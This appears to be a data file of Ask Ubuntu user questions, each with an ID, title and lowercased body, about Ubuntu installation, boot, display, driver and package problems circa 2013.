318024	how to check if everything is ok with unity3d in ubuntu 12.04 lts ?	please read the full post and then judge me . as suggested , to setup unity3d mode i at first checked /usr/lib/nux/unity_support_test -p and unity 3d support came positive . opengl vendor string : nvidia corporation opengl renderer string : geforce gt 630/pcie/sse2 opengl version string : 4.3.0 nvidia 310.14 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes so i tried unity -- reset to set unity3d . but after that , terminal just halted with a error message and repeatedly provided same error provided many-times . i opened a new terminal and reboot the system . and to my utter surprise , then i logged in , unity3d was enabled ! with system monitor i found compiz running ! and myunity star-up provided no message like one here my compizconfigsettingmanager is running properly . can i guess everything is ok ? not to mention , i am new to ubuntu .
318025	custom logs in rsyslog	i have configured rsyslog to log message to a centralised server it 's working fine and i 'm getting logs in my server 's /var/log directory with seperate directory for all the clients based upon their ip addresses ( ex : /var/log/ip-address/syslog.log ) in it . it generates a file named syslog.log and logs are stored in it my question is can i configure rsyslog to generate all the traffic in different files like http in httpd.log mail in mail.log etc .
318032	simple maas setup in ubuntu 13.04 and virtual box	main os : ubuntu 13.04 . maas host : installed in virtualbox using maas doucmentation . i created another virtual machine connected with same network as maas host . it 's booted successfully using pxe after all process . i am getting fatal : error inserting ipmi_si ( no such device ) and also that node is asking for username and password :
318033	what is the replacement for -n switch in aptitude in 13.04 ?	i am trying to purge xfce from my pc ( it got fubared so i want to destroy it and reinstall it ) . i noticed aptitude does n't have the -n wildcard any more . so aptitude purge -nxfce4 just lists the help . what is the replacement ?
318035	items can not be installed or removed in 12.04 over 10.4	there is a similar question already posted , but none of the responses are working for me . so i am reposting my question with the new information . i just installed ubuntu 12.04lts over 10.4lts . it seemed to go ok until i tried running my updates . when i launch software center i get the following error message : **items can not be installed or removed until the package catalogue is repaired . do you want to repair it now ? ** once update manager has finished the repairs , you can close it and return to the store . so i hit repair and then i get this message : package operation failed the installation or removal of a software package failed . so i hit ok and it goes back to the first error message items can not be installed or removed until the package catalogue is repaired . do you want to repair it now ? once update manager has finished the repairs , you can close it and return to the store . and it just continues repeating those two messages . how do i fix whatever is broken ? i reviewed answers for similar questions . i tried the suggestions in that link but they did not work . i tried to post the results but , being new to this system i am not allowed to post more than 2 links . however , it seems the crux of the problem is this : ( reading database ... 742676 files and directories currently installed . ) removing libxml-libxml-perl ... /var/lib/dpkg/info/libxml-libxml-perl.prerm : 11 : /var/lib/dpkg/info/libxml-libxml-perl.prerm : update-perl-sax-parsers : not found dpkg : error processing libxml-libxml-perl ( -- remove ) : subprocess installed pre-removal script returned error exit status 127 errors were encountered while processing : libxml-libxml-perl e : sub-process /usr/bin/dpkg returned an error code ( 1 ) again , my apologies for not posting everything from the terminal , but this system wo n't let me post more than 2 links .
318040	config files of the backup software	i 'm using ubuntu 's backup ( all settings - > backup ) . i have a long list of excluded-folders i entered in it ( in the folders tab ) , which i want to copy somewhere else . where can i find the file this list is stored in ? ( i 'm assuming the list is stored in a text file somewhere , like ~/.backup/ ... )
318048	logitech m235 does n't work	that is the error , i get when i try to work with it . jul 9 09:09:56 me kernel : [ 2740.896079 ] usb 4-2 : new full-speed usb device number 4 using uhci_hcd jul 9 09:09:57 me kernel : [ 2741.080112 ] usb 4-2 : new usb device found , idvendor=046d , idproduct=c52f jul 9 09:09:57 me kernel : [ 2741.080118 ] usb 4-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 jul 9 09:09:57 me kernel : [ 2741.080121 ] usb 4-2 : product : usb receiver jul 9 09:09:57 me kernel : [ 2741.080124 ] usb 4-2 : manufacturer : logitech jul 9 09:09:57 me kernel : [ 2741.088728 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1a.1/usb4/4-2/4-2:1.0/input/input15 jul 9 09:09:57 me kernel : [ 2741.088877 ] hid-generic 0003:046d : c52f.0005 : input , hidraw0 : usb hid v1.11 mouse [ logitech usb receiver ] on usb-0000:00:1a.1-2/input0 jul 9 09:09:57 me kernel : [ 2741.093420 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1a.1/usb4/4-2/4-2:1.1/input/input16 jul 9 09:09:57 me kernel : [ 2741.094363 ] hid-generic 0003:046d : c52f.0006 : input , hiddev0 , hidraw1 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:1a.1-2/input1 jul 9 09:09:57 me mtp-probe : checking bus 4 , device 4 : `` /sys/devices/pci0000:00/0000:00:1a.1/usb4/4-2 '' jul 9 09:09:57 me mtp-probe : bus : 4 , device : 4 was not an mtp device any suggestions ? thanks
318051	how to have cntlm configuration per user ?	this tutorial http : //zipizap.wordpress.com/tag/cntlm/ suggests configuring cntlm using the file etc/cntlm.conf . it works great , but it means that all users logged to the machine will be using the same password . is it possible to have the username and password configured for each user ?
318052	how to remove kde stuff from software updater	hi i had kde installed besides unity . i did n't like it so i 've uninstalled kde . but even after that i still get updates for some kde stuff ( konqueror , kate , okular , akonadi and many many things ... ) i do n't see any ppa related to kde in software updater . how do i remove it completely ? or at least stop getting those updates ?
318055	inserting page number in libreoffice	i have created a document in libreoffice writer and would like to insert page numbers in the document . i am trying to manually insert the page numbers at each footer . but once i insert a desired page number at the footer , all other pages are marked with the same page number . how could i fix this ?
318056	how to `` sleep '' computer while keeping internet connection alive	i am currently using my laptop to share my internet connection with my desktop . it works great ( my belkin micro-n adapter quit on me ) for now , but the laptop is so hot , just sitting there burning energy . i would like to shut it down to it 's lowest powered state while keeping the connection alive . any thoughts ?
318059	text is cut out	i just installed ubuntu 12.04 desktop on my pc . everything is ok , but when i use firefox , terminal . the text is cut out , i can fix it by zooming in/out . this is the output when i run lspci | grep vga . 00:02.0 vga compatible controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) so how can i fix it ? this is the image showing the problem ( notice the text on the tags , for example , specially the 'o ' character ) : after i zoom in , it looks better : edit : well , i followed vanni ' post in font corruption : lines through characters . now , everything is ok , the text is n't cut out . thanks
318061	grub rescue error ubuntu 13.04 dual boot	i 'm a newbie to linux and had install ubuntu 12.10 dual booted with windows8 . but the ubuntu several times showed some wierd kind of errors ( which i 've never heard of , like it got hanged and freezed ) . so i decided to upgrade to 13.04 . what i did : i wanted to increase the space allocated for the disk on which ubuntu was installed , so i shrinked one disk ( using windows partion manager ) and deleted the one in which ubuntu ( 12.10 ) was installed . so when i restarted it , it showed `` grub rescue '' kind of error . i tried to install ubuntu ( by live cd ) , it does not show any partition . it shows the whole hard disk as a single partition . moreover , when i tried to mount any of the partition ( of total of 5 ) , it says something like `` can not mount , the file system is not in fine state ... shutdown windows and try again '' . when i tried to boot windows xp ( the only cd i have atm ) , it stuck at `` examining disk at bus 0 ... '' something . i searched and have installed boot-repair , whose log is http : //paste.ubuntu.com/5857634/ somebody please guide me as i do n't want all my data be erased . ps : i 've about 4-5 hours to run it otherwise my brother wo n't let me live at peace . : / ( sorry if the question has already been asked . i searched but could n't find any topic with exactly the same question , and moreover i have to save the data on the disk ; i ca n't take risks ) . thanks
318062	what is the command to minimize the gnome terminal ?	how can i minimize the terminal window using a command ? for example : i use the clear command to clear the terminal output , which command can i have to use to minimize the terminal window ?
318063	struggling to install broadcom 4311 on a hp 530 laptop running ubuntu 12.10	i have ubuntu 12.10 on a hp530 laptop , i 've tried everything on the ubuntu forums , but ca n't get the wireless to work . it has broadcom 4311 wireless card built in . do n't know what else to try , please assist . i have the broadcom bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) card in my laptop . alot of sites says to not to install proprietary broadcom driver as it do n't work .
318064	increase display resolution horizontally to cut off part of screen , in multi-monitor setup	so i have 2 monitors of 1920x1080 resolution each . i am using them in portrait mode so each resolution is 1080x1920 . i have a video which is 2360x1920 i.e . ( 1080p+200p+1080p ) x1920p . i want to run the video fullscreen , and cut the 200x1920p part in the middle . is there anyway i can modify my xorg.conf to do this ? tl ; dr - multimonitor setup , wants to increase horizontal resolution of monitor 1 , the `` increased '' part of the resolution needs to be cutoff ( not displayed in screen/hidden ) . is there anyway i can achieve this ? thank you . edit- here is an image demonstrating the setup -
318072	will ubuntu import all important files ?	this is actually a question for later when ubuntu 13.10 comes out but i could n't wait ... i am asking when ever you upgrade to ubuntu 13.10 or any version will all your important files transfer ? i am still a bit new to ubuntu and i started out with ubuntu 13.04 so i am a very new ubuntu-er .
318081	gui for server editions	i 'm developing a photo sharing app so that i can seamlessly upload to my photos to my home computer even when i 'm too much far from my home . for this purpose i 'm planning to setup my own home server using postgresql and glassfish because i only know c and java . the question is that is there any gui available for ubuntu 12.04 server edition so that i can easily manage these stuffs ? i never used a server environment before .
318092	how can i *disable* ctrl+alt+backspace ?	building on a question from 2010 ( 3 years ago ) i 'm trying to achieve the exact opposite : i want to disable the ctrl+alt+â keyboard shortcut to kill the x server . for me , it appears to be disabled in system- > preferences- > keyboard but practically it 's still up and running . dontzap does n't seem to be `` active '' ( as in actively developed ) either , and it seems counterintuitive to have to install it in order to disable this key-combo . any other ways to properly disable the shortcut ? ps : i think it 's a bug . pps : some time ago , i enabled it cuz i thought it was kinda cool - not knowing that it was a one-way street without a functioning / reliable option to disable it again .
318106	trying to run sudo apache2ctl restart installing koha	i am new in ubuntu , i am trying to install koha , so i tried to restart apache2 with ... sudo apache2ctl restart but i get the following error ... warning : documentroot [ /etc/apache2/opac_www_dir ] does not exist [ tue jul 09 11:14:58 ] [ error ] ( eai 5 ) no address associated with hostname : could not resolve host name webserver_host__ip : webserver_port_librarian__ -- ignoring warning : documentroot [ /etc/apache2/intranet_www_dir ] does not exist syntax error on line 108 of /etc/apache2/sitse-enabled/koha : the port number `` webserver_host : __webserver_port_librarian__ '' is outside the appropriate range ( i.e , 1..65535 ) action 'restart ' failed
318107	virtualbox 4.2 not booting any virtual machines	i upgraded from 12.10 to 13.04 and my virtualbox-4.1 stopped working . so i downloaded the virtualbox-4.2 deb for raring ringtail from their website and installed it . when i start virtualbox , it starts fine . on trying to start a virtual machine i get this error . rtr3initex failed with rc=-1912 ( rc=-1912 ) the virtualbox kernel modules do not match this version of virtualbox . the installation of virtualbox was apparently not successful . executing '/etc/init.d/vboxdrv setup' may correct this . make sure that you do not mix the ose version and the puel version of virtualbox . on running /etc/init.d/vboxdrv setup i get : farhat @ palantir : ~ $ /etc/init.d/vboxdrv setup * stopping virtualbox kernel modules * can not unload module vboxdrv what should be done here ? thanks , eta : farhat @ palantir $ sudo dpkg -l | grep -e virtualbox -e linux-headers -e dkms ii dkms 2.2.0.3-1.1ubuntu2 all dynamic kernel module support framework ii linux-headers-3.8.0-26 3.8.0-26.38 all header files related to linux kernel version 3.8.0 ii linux-headers-3.8.0-26-generic 3.8.0-26.38 amd64 linux kernel headers for version 3.8.0 on 64 bit x86 smp ii linux-headers-generic 3.8.0.26.44 amd64 generic linux kernel headers rc virtualbox-4.1 4.1.26-84997~ubuntu~precise amd64 oracle vm virtualbox ii virtualbox-4.2 4.2.16-86992~ubuntu~raring amd64 oracle vm virtualbox
318109	dns_error_bad_packet during join ubuntu to domain	when i 'm trying to join ubuntu client machine to domain server i 'm getting this error : error : dns_error_bad_packet [ code 0x0000251e ] a bad packet was received from a dns server . potentially the requested address does not exist .
318111	custom terminal app id	i am running matlab through the terminal , with the -nodesktop and -nosplash flags . i even created a custom laucher with gnome-terminal -e `` matlab -nodesktop -nosplash '' . however , the os ( ubuntu 12.10 ) recognizes it as just another terminal window . is it possible to somehow assign a different process id and title to that particular terminal window ( with maybe a specific icon ) , so that it can be seen as a separate applications , which i can travel to simply with alt+tab , and which the os does n't group with the rest of terminal windows ?
318112	alt-gr key binding not working , ubuntu 13.04	i 'm using compiz , but not sure if that 's the problem or not . my alt keys are working fine , but i 'm trying to do something particular with the alt-gr key for a custom russian keyboard layout . glad to provide specific information on request . any help would be greatly appreciated . steps already taken : i 've gone into keyboard layout settings -- > options , and made sure the correct compose key option is set ( at right alt ) . chosen my custom keyboard layout ( from the keyboard layouts section ) and then brought up the onscreen keyboard which allows me to check which key is being pressed with onscreen feedback cue . doing this indicates that my compose key is indeed the right alt , and it does flash when pressed . it also indicates that in my custom keyboard layout is correct on the key that i want : for the z key i have mapped 'з ' ( pronounced `` ze '' ) and for alt-gr + z i have mapped 'ж ' ( 'zhe ' ) . this information shows up in the onscreen keyboard . however , trying this key combination produces no text on the first press , and on subsequent ( joint / combo ) presses , this produces only the non-altered 'з ' , same as i 'm expecting from the non-combo z press only . in summary , the compose key is mapped correctly , and the character i want is mapped correctly ( all 4 options ( 2 letters each with upper and lower case ) appear in the onscreen keyboard ) , but the combination does nothing ( on first press ) and then the non-altered thing subsequently . this is what my \usr\share\x11\xkb\symbols\ru file looks like : [ ... ] key < ab10 > { [ u0417 , u0437 , u0416 , u0436 ] } ; according to the documentation i 've seen , the first two entries should be produced by pressing the z key and shift + z respectively ( i 'm working in dvorak , so that 's the key just to the left of the right-shift key ) , and the last two should be produced with the compose + z and shift + compose + z respectively . but , as mentioned , the actual behaviour i 'm getting with alt-gr is nothing and then the default z and shift+z behaviour only .
318119	lenovo g580 ideapad - replacing windows 8 with ubuntu	notebook specifications : lenovo g580 ideapad ( model 20150 ) - with win8 cpu i3-31101m , 2.4gh , 4gb ram , intel hd4000 gpu i intend to completely replace windows 8 with ubuntu , and to avoid problems , to set up the bios to legacy compatible . some of the bios settings i intend to make were not addressed in previous threads concerning this specific notebook . hence this thread . bios settings security menu : ( 1 ) secure boot [ enabled ] change to [ disabled ] ( 2 ) reset to setup mode [ enter ] - press `` enter '' to clear pk , disable secure boot and enter setup mode . boot menu : ( 1 ) boot mode [ uefi ] change to [ legacy support ] ( 2 ) boot priority [ uefi first ] change to [ legacy first ] ( 3 ) usb boot [ enabled ] leave as enabled exit menu : os optomised defaults [ win8 64bit ] change to [ other os ] installing ubuntu make a bootable usb stick using another ubuntu system and attempt to boot up this notebook and and select ubuntu to completely erase and use the whole hdd . questions are the bios settings i intend to make ok for installation of ubuntu ? will the performance and/or stability of ubuntu be affected by not using uefi and secure boot ? is there any need at all to use uefi and secure boot in a single ubuntu install ( with no win8 ) - if yes - what should the bios settings be like ? should i install 32bit or 64bit for this specific notebook , considering it has only 4gb ram ( probably shared with intel hd4000 gpu ) ? i 'm a total noob ! please help ...
318120	how do i hide grub entries ?	i recently followed this guide to dual-booting oem windows 8 and ubuntu , and now i 've got an awful grub menu full of redundant entries . all i want are two entries : one for ubuntu , and one for windows . i 'd also like to be able to rename them , since the entry for windows 8 has a name that does n't make any sense .
318123	ubuntu touch the first phones	i am a web-developer and i 'm really love ubuntu . i use it from ubuntu 8.04 and never get back to ms products anymore . i like it 's design and echosystem . sometimes it slow or luggy , but all problems i can solve by myself or it 's because of my laptop 's hardware . i have and android phone for now - lg gt540 optimus swift for me it is beacoming too slow - i need to be online with email , skype , hangouts etc ... i decided to change my phone . first of all i want the smartphone wich i will not want to reflash or use some custom firmwares . for me it is the ubuntu phone . first of all the question is addressed to the people who work with ubuntu touch . how much wil cost the ubuntu phone ? as i know the first will be presented on october 2013 - is it true ? can i know any specifications - cpu , ram , display sizes etc.. ? i am working on the ubuntu touch apps to intergrate social networks from exussr countries like facebook is integrated - as a result it will be comfortable to use for russians , ukrainians and others . please , let me know - can i wait for ubuntu phone in october , novermber or december 2013 and how much money i need for it ? for me the smartphone is not a toy - it is the work instrument , and i want the same os on my work laptop and smartphone . thank you !
318125	dual boot 64 bit windos 7 and ubuntu	64 bit windows 7 is in the machine . i download 64bit iso file and make a cd . i set the bios , let the cd drive as the first boot option . when i tried to install ubuntu , it starts the process as normal . windows 7 is in drive 'c ' . as a came to know , it should recognize the existing o/s withing the process and should appear it on the monitor . but the machine says there is no o/s , so choose 'c ' or some where else . in addition it says , i will loose just my data files . so i stooped the process to avoid loosing my existing o/s . i tried it several times and got the same experience . then i boot windows 7 and run 'wubi ' file . the first window is appearing normal . i can select the drive where to install ubuntu & selected the quota for ubuntu , user name , password . when i continue , it goes to next window and doing some process for few seconds . then the process is stop ( critical stop ) , and the massage says , it can not find disk images . it happens again and again . can somebody guide me pls ?
318128	how to adjust size of bits for frame ?	am using currently program `` recordmydesktop '' - which again uses ffmpeg too - for to record some video of desktop-program . how do i adjust the size in bytes for the frame ? ! - i want to achieve better resolution of the video and then i want to set at least 10 frames per second . - can i do this from terminal for program `` recordmydesktop '' ? ! - currently the graphics are `` shake , rattle and roll '' - thx .
318129	why does n't removing `` recently-used.xbel '' clear my `` recent '' folder ?	i have searched on google , and i have completed the following steps : delete `` all '' activity history from the `` privacy '' application . remove the file `` recently-used.xbel '' from ~/.local/share $ nautilus -q remove the file `` activity.sqlite '' from ~/.local/share/zeitgeist $ zeitgeist-daemon -- replace & i checked my `` recent '' folder in between all of the above steps and none of them had any impact . i also tried : remove all files with `` sqlite '' in the name from ~/.local/share/zeitgeist ( 3 files : ) activity.sqlite activity.sqlite-shm activity.sqlite-wal $ zeitgeist-daemon -- replace & none of the above had any impact on the contents of the `` recent '' folder . according to everything i 've found , removing the file `` recently-used.xbel '' and restarting nautilus should clear the `` recent '' folder . why is n't it working ?
318131	clean uninstall of virtualenv and virtualenvwrapper	since i do not use them at this time i tried to uninstall virtualenv and virtualenvwrapper via the ubuntu software center . now whenever i open a console i get the following error message : traceback ( most recent call last ) : file `` < string > '' , line 1 , in < module > importerror : no module named virtualenvwrapper.hook_loader virtualenvwrapper.sh : there was a problem running the initialization hooks . if python could not import the module virtualenvwrapper.hook_loader , check that virtualenv has been installed for virtualenvwrapper_python=/usr/bin/python and that path is set properly . also the directory ~/.virtualenvs/ is still present . how can i bring my system back to a clean and functional state as before the installation of virtualenv and virtualenvwrapper ? updates as suggested i checked the following files for occurrences of virtualenv each with a negative result : ~/.bashrc ~/.profile /etc/profile /etc/profile.d/* /etc/environment
318138	what do i need to download and how do i install those programs ?	i am new to ubuntu . i just installed it . i want to download my xampp servers , spotify or adobe 's flash player , but i get suggestions of *.zip , *.ga or something . operating systems `` lunix '' , `` yum '' and stuff like that . i have no idea what this stuff is or what i should do . i 've switched over from windows 7 on my asus pc .
318140	i 'm having a difficulty in the application intalled menu	how can i see all the installed application collectively except the default ones if there 's not , please make one because it 's hard to know if its a default or a installed one . and a default programs button . thanks !
318141	what is the best java lookandfeel on ubuntu ?	java applications does not look good on linux platform , specially font rendering is awful ! i use netbeans ide for php developing and gui is not as good as it should be , for instance eclipse has a very nice and native-looking gui and font rendering is awesome . i already have solved font rendering issue using infinality project and patched openjdk7 using infinality font rendering . what is the best java lookandfeel that makes java applications look as close to native apps as possible ? im currently using tinylookandfeel .
318142	problems with reinstalling windows vista	i want to dual boot ( windows vista and ubuntu ) and i only have ubuntu now , i also have an installation cd for windows vista , which i can start through playonlinux . my problem is that it says the following during the installation : this computer does not have enough space available for temporary files . there is at least 449mb of free space on this partition necessary . make space and start the installation again if you want to install windows . error : 0x80004005 so the question is : where/how can i delete temporary files or how can i delete ubuntu , so i can make windows my primary operating system . with a little help i can also use the terminal , but rather not . the total free space in my file system is 134,7gb
318152	install ubuntu , you can not continue	ubuntu version : ubuntu-12.04.2-desktop-amd64.iso computer configuration : x86-compatible desktop computer model operating system : windows xp professional 32-bit sp3 ( directx 9.0c ) hardware processor : intel pentium ( pentium ) dual-core e5300 @ 2.60ghz motherboard : asus p5g41t-m lx v2 ( intel 4 series chipset - ich7 ) memory : 4gb ( shitai ddr3 1333mhz ) hard drive : seagate st500dm002-1bd142 ( 500gb / 7200 rpm / min ) graphics : intel g41 express chipset ( 256mb / asus ) monitor : mon2150 analog ( 21.5 inches ) optical drive : toshiba - samsung cd/dvdw ts-h652h dvd burner sound card : realtek alc887 @ intel 82801g ( ich7 ) high definition audio nic : realtek rtl8168e pci-e gigabit ethernet nic / asus using universal-usb-installer-1.9.3.6.exe i made a boot disk . i restarted my computer , pressed f8 , selected usb boot , then got no response from the computer , only a black screen . i removed the usb drive on the restoration of normal windows start .
318158	how do i execute a sudo command without a password ?	i have a simple shell script that uses the killall command . i would like to run this command without needing to enter my password . i 've brought up visudo and inserted the following line into it : anthony localhost = ( root ) nopasswd : /usr/sbin/myscript i close terminal , reopen it , and issue my script command . i am immediately greeted with a prompt for my password . what am i doing wrong ? is this the proper way to do this ?
318164	getting error during fake authentication ( aircrack-ng )	i am getting some error when i am sending fake authentication using airplay-ng on ubuntu 13.04 . it shows mon0 is in different channel . can u suggest me any patch which solves this problem i also do n't know how to install the patch
318165	want to get rid of installer on ubuntu for flash drive	i 'm wondering if it 's possible for me to get rid of the pop-ups on my screen asking if i want to install ubuntu . ( i 'm using a usb drive ) and so i can basically carry around a flash drive to be used as a computer .
318172	sound problem with chrome	ubuntu 13.04 installed , worked but few days ago sound disappeared on youtube , so now there is no sound in google chrome , but it works in vlc and rythmbox .
318185	error when booting , `` broken pipe ''	when i reboot my computer , a black screen appeared with the following message : could not write bytes : broken pipe * stopping save kernel messages ... [ ok ] * checking battery state ... [ ok ] * stopping system v run level compatibility ... [ ok ] this is the third time i have reformatted my computer and reinstalled xubuntu for the same error . the following is the log file from `` /var/log/lightdm/lightdm.log '' when following @ sameetandpotatoes ' instructions found below : [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.2.3 , uid=0 pid=1033 [ +0.00s ] debug : loaded configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for greeter [ +0.00s ] debug : starting local x display [ +0.00s ] debug : using vt 7 [ +0.00s ] debug : activating vt 7 [ +0.00s ] debug : logging to /var/log/lightdm/x-0.log [ +0.02s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.02s ] debug : launching x server [ +0.02s ] debug : launching process 1041 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +0.02s ] debug : waiting for ready signal from x server :0 [ +0.04s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.04s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +1.20s ] debug : got signal 10 from process 1041 [ +1.20s ] debug : got signal from x server :0 [ +1.20s ] debug : connecting to xserver :0 [ +1.20s ] debug : starting greeter [ +1.20s ] debug : started session 1051 with service 'lightdm ' , username 'lightdm' [ +1.52s ] debug : session 1051 authentication complete with return value 0 : success [ +1.52s ] debug : greeter authorized [ +1.52s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +1.52s ] debug : session 1051 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/lightdm-gtk-greeter [ +1.73s ] debug : greeter closed communication channel [ +1.73s ] debug : session 1051 exited with return value 1 [ +1.73s ] debug : greeter quit [ +1.73s ] debug : failed to start greeter [ +1.73s ] debug : stopping display [ +1.73s ] debug : sending signal 15 to process 1041 [ +1.76s ] debug : process 1041 exited with return value 0 [ +1.76s ] debug : x server stopped [ +1.76s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +1.76s ] debug : releasing vt 7 [ +1.76s ] debug : display server stopped [ +1.76s ] debug : display stopped [ +1.76s ] debug : stopping x local seat , failed to start a display [ +1.76s ] debug : stopping seat [ +1.76s ] debug : seat stopped [ +1.76s ] debug : required seat has stopped [ +1.76s ] debug : stopping display manager [ +1.76s ] debug : display manager stopped [ +1.76s ] debug : stopping daemon [ +1.77s ] debug : exiting with return value 1
318186	wait for dd command to fully write to the disk	i 'm using the dd command to create a bootable usb from iso file : sudo dd if=~/desktop/ubuntu.iso of=/dev/sdx bs=1m after pressing enter it momentarily exits and gives me : 915+0 records in 915+0 records out 959447040 bytes ( 959 mb ) copied , 0.539375 s , 1.8 gb/s so it 's like running in background because i can see that the flash drive is working . eventually it will stop copying and i can remove the drive successfully but the question is why does n't dd command wait for copying to finish . why does it run in background . and how can i make it wait ?
318190	how to install the google play lens on 13.04	i 've tried following the instructions from , `` http : //www.omgubuntu.co.uk/2012/11/new-lens-lets-you-search-google-play-from-the- unity-dash '' . the first command , `` sudo add-apt-repository ppa : abhshk-btra/rotatingcanvas '' adds the repository and returns successfully . the second command , `` sudo apt-get update '' fails with , '' w : failed to fetch http : //ppa.launchpad.net/abhshk-btra/rotatingcanvas/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . '' i understand the failure easily enough , there are no files for 'raring ' . how to proceed from here ? wait for the ppa to be updated , or is there another way to get the lens installed ? thank you for taking the time to look at this , steven
318193	gnome 3.8 on ubuntu 13.04 breaks unity	i 've read an article about installing gnome 3.8 and tried to install it ( successfully ) : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update & & sudo apt-get install gnome-shell ubuntu-gnome-desktop then , i saw that i have a problem with unity and other default ubuntu 's behaviors : no icons on the desktop . launcher not always turned on when i press on winkey ca n't select squares on the desktop ( the transparent orange ) with the mouse . themes have changed , font , icons , etc . startup image has changed , also the color of grub menu ( from purple to blue ) . other small things . then , i decided to uninstall gnome 3.8 and performed the steps in the article : removed gnome3-team-gnome3 from the repository ( in /etc/apt/sources.list.d ) sudo apt-get update sudo apt-get remove gnome-shell ubuntu-gnome-desktop did n't help , so i tried at least to change the themes with gnome tweaks , help a little bit but the fonts are n't as the default . tried to install gnome 3 from the canonical repository ( the default ) , there i could n't do it . it said something about dependencies . how do i turn back the system to the previous state ? in the end i 've tried to install the old gnome-shell and after a few games this is the best i 've come : maybe this will help , this is the message i 've got when i tried to install the original gnome-shell : the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : libgjs0-libmozjs185-1.0 e : unable to correct problems , you have held broken packages .
318196	how to remove weird screen glitches in ubuntu 13.04 ?	a couple of weeks ago i started noticing these weird black lines appearing on my screen every now and then ( ca n't really say when ) . it never happened before . last time it happened i took the screenshot below . i have a lenovo z580 laptop with intel graphics and nvidia gt graphics . i use bumblebee and tlp for power management . i do n't know if those apps have anything to do with it . the glitches go away when i change the active window or move a window around on the screen . i have got the feeling that it might have something to do with chrome browser being open ... . does anyone have an idea how to get rid of this ? it 's not really a critical problem but it is really annoying . i appreciate any help . thanks a lot ! : )
318197	install of mythbuntu steps docs	is there a written ( txt ) step by step on install of mythbuntu that a newbie can follow easily ?
318202	export ubuntu to a pendrive	how can i make an exact copy ( like migration ) of my ubuntu 12.10 ( i installed it through wubi ) in a capable pendrive ( like 32 gb ) ? that would be useful in future since i could also remove wubi and keep my ubuntu usable on other pcs . and another question , if i do this , there is a possibility to upgrade in future without losing applications or data ?
318208	what was the design rationale behind auto-hiding the application menu in unity ?	auto-hiding the application menu in unity makes no sense to me . it slows me down because instead of automatically moving the cursor to the appropriate menu item i have to look for it then remember that it is hidden and move my cursor to the menu bar . maybe over time this will become automatic but even so it still does n't make any sense . just wondering if there are some good reasons for this decision or was it just a programmer showing off .
318216	low resolution on second monitor , xrandr throws error	when i connect an external monitor to my laptop through vga cable , it has extremely low resolutions and no higher options to choose from . i tried the following ( based on this ; other sites just suggest the same approach ) ( restarting does n't help ) $ gtf 1920 1080 60 # 1920x1080 @ 60.00 hz ( gtf ) hsync : 67.08 khz ; pclk : 172.80 mhz modeline `` 1920x1080_60.00 '' 172.80 1920 2040 2248 2576 1080 1081 1084 1118 -hsync +vsync $ xrandr -- newmode `` 1920x1080_60.00 '' 172.80 1920 2040 2248 2576 1080 1081 1084 1118 -hsync +vsync $ xrandr -- addmode vga-0 `` 1920x1080_60.00 '' x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 31 current serial number in output stream : 32 the monitor is a philips brilliance 231b . when turned on , it shows 'use 1920x1080 @ 60hz for best results ' . i do n't know much about this so it could well be something trivial . thanks in advance for any suggestions ! don ' know if it 's relevant but xrandr shows ( after the above steps ) : $ xrandr screen 0 : minimum 8 x 8 , current 2320 x 1050 , maximum 8192 x 8192 vga-0 connected 640x480+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 640x480 59.9*+ 320x240 120.1 tv-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected 1680x1050+640+0 ( normal left inverted right x axis y axis ) 331mm x 207mm 1680x1050 60.0*+ hdmi-0 disconnected ( normal left inverted right x axis y axis ) 1920x1080_60.00 ( 0x270 ) 172.8mhz h : width 1920 start 2040 end 2248 total 2576 skew 0 clock 67.1khz v : height 1080 start 1081 end 1084 total 1118 clock 60.0hz
318220	install wine1.5 not wine1.6	i am trying to use adobe reader 10 with wine in ubuntu 12.04 . the installer does n't work on 1.4 ; but the winehq database shows it running under 1.5 . i tried installing wine1.5 as per the instructions on the download page ; but the package that the wine 1.5 beta link points to installs the 1.6 release candidate . how do i get the older 1.5 package ?
318222	how can i recover windows 8 after deleting ?	while installing ubuntu 13.04 i accidentally deleted the windows 8 system entirely ! how and where can i get windows 8 back ?
318226	after installing ubuntu i no longer have the option to start windows 7 professional	i have just installed ubuntu for the first time . i followed the steps for partitioning and root directories as recommended . however , when i partitioned the /dev/sda1 was green and the disk did not recognize windows 7 . after installation , the ubuntu was orange . when i reboot i am not given a choice of operating system : instead it goes straight to ubuntu . how do i change this so i can access windows 7 again ?
